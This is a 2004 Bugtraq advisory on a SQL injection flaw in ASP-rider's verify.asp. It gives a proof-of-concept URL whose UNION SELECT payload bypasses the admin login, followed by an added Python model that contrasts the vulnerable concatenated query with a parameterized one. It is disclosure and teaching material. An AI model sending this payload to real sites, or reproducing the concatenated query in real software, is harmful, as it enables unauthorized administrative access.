Bugtraq mailing list archives
ASP-rider is vulnerable to sql injection attack
From: shervin khaleghjou <oil_karchack () yahoo com>
Date: 15 Dec 2004 03:23:08 -0000
-------------------www.karchack.com--------------------------
-------------------www.karchack.net--------------------------

Affected software description:
asp-rider is a full Farsi weblog written in ASP
www.asp-rider.com
--------------------------------------
Vulnerabilities:
The file verify.asp in the blogadmin folder is vulnerable to SQL injection attack.
-------------------------------------
Proof of concept:
You can easily log in to the weblog administrator page by entering:
www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
-------------------------------------
This vulnerability is already patched.

www.karchack.com
www.karchack.net
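Added example, not part of the original post and not ASP-rider's code: a Python/sqlite3 model of a login check that behaves as the proof of concept describes, beside a parameterized version of the same check. Only the table name tbl_users, the eight-column UNION and the two request values come from the advisory; the column names, the sample row, and the assumption that verify.asp fetches the row by username and then compares the password field are hypothetical.

```python
import sqlite3

# From the advisory: table tbl_users, 8 columns, and the two request values.
POC_USERNAME = "'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='"
POC_PASSWORD = "1"

def make_db():
    # Constructed schema and row; column names and positions are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_users (id, username, password, c4, c5, c6, c7, c8)")
    db.execute("INSERT INTO tbl_users VALUES (7, 'admin', 's3cret', 0, 0, 0, 0, 0)")
    return db

def build_concat_sql(username):
    # Vulnerable pattern (assumed): the request value is spliced into the SQL text.
    return "SELECT * FROM tbl_users WHERE username='" + username + "'"

def login_concat(db, username, password):
    row = db.execute(build_concat_sql(username)).fetchone()
    # Assumed second step: compare the submitted password with the row's field.
    # str() stands in for a loosely typed comparison.
    return row is not None and str(row[2]) == password

def login_param(db, username, password):
    # Hardened form: the value is bound as data and never parsed as SQL.
    row = db.execute("SELECT * FROM tbl_users WHERE username=?", (username,)).fetchone()
    return row is not None and str(row[2]) == password

if __name__ == "__main__":
    db = make_db()
    print(build_concat_sql(POC_USERNAME))
    print("concatenated:", login_concat(db, POC_USERNAME, POC_PASSWORD))
    print("parameterized:", login_param(db, POC_USERNAME, POC_PASSWORD))
```

Under this model the UNION branch supplies a row whose every field is 1, which is why the proof of concept submits password=1; with the bound parameter the same input matches no row.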